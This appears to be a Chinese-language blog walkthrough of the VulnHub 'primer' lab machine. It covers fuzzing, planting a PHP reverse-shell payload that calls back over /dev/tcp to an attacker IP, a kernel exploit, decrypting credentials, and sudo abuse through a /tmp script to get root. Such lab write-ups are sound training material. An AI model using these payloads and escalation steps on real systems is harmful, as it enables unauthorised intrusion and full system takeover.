primer
虚假的打法
dirb
dirb http://192.168.1.115 -X .php .txt
-X指定后缀
参数爆破
Fuzzing/Fuzz_For_Web at master · hacknpentest/Fuzzing · GitHub
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 500 http://website-ip/index.php?FUZZ=somethingtxt
可以man查看一下hc hw hh区别
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.1.115/index.php\?FUZZ\=something
截图
scrot -s xxx.png
查看图片
xdg-open xxx.png
wordpress扫描
wpscan
发现主题内的secret.php
写入一句话马
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.200.131/443 0>&1'");
?>
触发方式查看上一级描述
查阅得wp的主题在wordpress/wp-content/themes/
即:wordpress/wp-content/themes/twentynineteen/secret.php
本地nc即可获得反弹shell
sudo -l发现提示
sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(root) NOPASSWD: /home/saket/enc
enc无法读取
www-data@ubuntu:/home/saket$ ls
ls
enc
password.txt
user.txt
uname发现内核太老
是Linux ubuntu 4.10.0-28-generic
searchsploit Linux ubuntu 4.10.0-28
searchsploit -m 45010.c
wget上传payload,编译运行
gcc 45010.c -o getRoot
提权成功
真正的打法
全局搜索铭感文件,比如backup,也可以用脚本来跑
可以看到一个/opt/backup文件夹
www-data@ubuntu:/opt/backup/server_database$ cat backup_pass
cat backup_pass
your password for backup_database file enc is
"backup_password"
Enjoy!
回到/home/saket运行enc
www-data@ubuntu:/home/saket$ sudo ./enc
sudo ./enc
enter password: backup_password
good
www-data@ubuntu:/home/saket$ cat enc.txt
cat enc.txt
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=
www-data@ubuntu:/home/saket$ cat key.txt
cat key.txt
I know you are the fan of ippsec.
So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.
ippsec的md5
366a74cb3c959de17d61db30591c39d1
for cip in $(cat cipher);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4='|openssl enc -d -a -$cip -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null;echo $cip;done
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor,aes-256-ecb
验证
/home/kali/Desktop/web/vulnhub/primer echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4='|openssl enc -d -a -aes-256-ecb -K 3336366137346362336339353964653137643631646233303539316333396431
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor,#
ssh连入
sudo -l发现提示,可以无密码root权限执行/home/victor/undefeated_victor中的内容
$ sudo -l
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User saket may run the following commands on ubuntu:
(root) NOPASSWD: /home/victor/undefeated_victor
$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
/tmp目录下查看是否有challenge文件,发现没有challenge文件
cd /tmp
echo '#!/bin/bash' >challenge
echo '/bin/bash' >>challenge
chmod +x challenge
sudo /home/victor/undefeated_victor
最后拿下靶机
$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
root@ubuntu:/tmp# whoami
root
标签:bin,enc,usr,ubuntu,home,靶机,primer,victor
From: https://www.cnblogs.com/ethereal258/p/18406794